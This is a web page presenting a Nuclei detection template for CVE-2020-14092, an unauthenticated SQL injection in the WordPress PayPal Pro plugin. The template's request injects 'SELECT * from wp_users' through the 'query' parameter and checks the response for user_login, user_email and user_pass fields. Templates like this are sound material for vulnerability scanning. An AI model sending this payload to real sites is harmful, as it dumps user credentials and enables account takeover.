Skip to content

WordPress PayPal Pro <1.1.65 - SQL Injection

ID: CVE-2020-14092

Severity: critical

Author: princechaddha

Tags: cve,cve2020,wp-plugin,sqli,paypal,wpscan,wordpress,ithemes

WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the ‘query’ parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.

id: CVE-2020-14092
info:
name: WordPress PayPal Pro <1.1.65 - SQL Injection
author: princechaddha
severity: critical
description: WordPress PayPal Pro plugin before 1.1.65 is susceptible to SQL injection via the 'query' parameter which allows for any unauthenticated user to perform SQL queries with the results output to a web page in JSON format.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
remediation: |
Update to the latest version of the WordPress PayPal Pro plugin (1.1.65 or higher) to mitigate the SQL Injection vulnerability.
reference:
- https://wpscan.com/vulnerability/10287
- https://wordpress.dwbooster.com/forms/payment-form-for-paypal-pro
- https://nvd.nist.gov/vuln/detail/CVE-2020-14092
- https://wordpress.org/plugins/payment-form-for-paypal-pro/#developers
- https://wpvulndb.com/vulnerabilities/10287
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-14092
cwe-id: CWE-89
epss-score: 0.66877
epss-percentile: 0.97643
cpe: cpe:2.3:a:ithemes:paypal_pro:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: ithemes
product: paypal_pro
framework: wordpress
tags: cve,cve2020,wp-plugin,sqli,paypal,wpscan,wordpress,ithemes
http:
- method: GET
path:
- "{{BaseURL}}/?cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users"
matchers-condition: and
matchers:
- type: word
part: header
words:
- "text/html"
- type: word
part: body
words:
- '"user_login"'
- '"user_email"'
- '"user_pass"'
- '"user_activation_key"'
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100b42fbb41d082b92bccab9902b589980e0fcebbcabe0bc29cb9b4c19e3c965d1c0221008902b429232ddce6c7259a9f9109acf2712d90782deb88591046c3b08fa8c7b3:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2020/CVE-2020-14092.yaml"

View on Github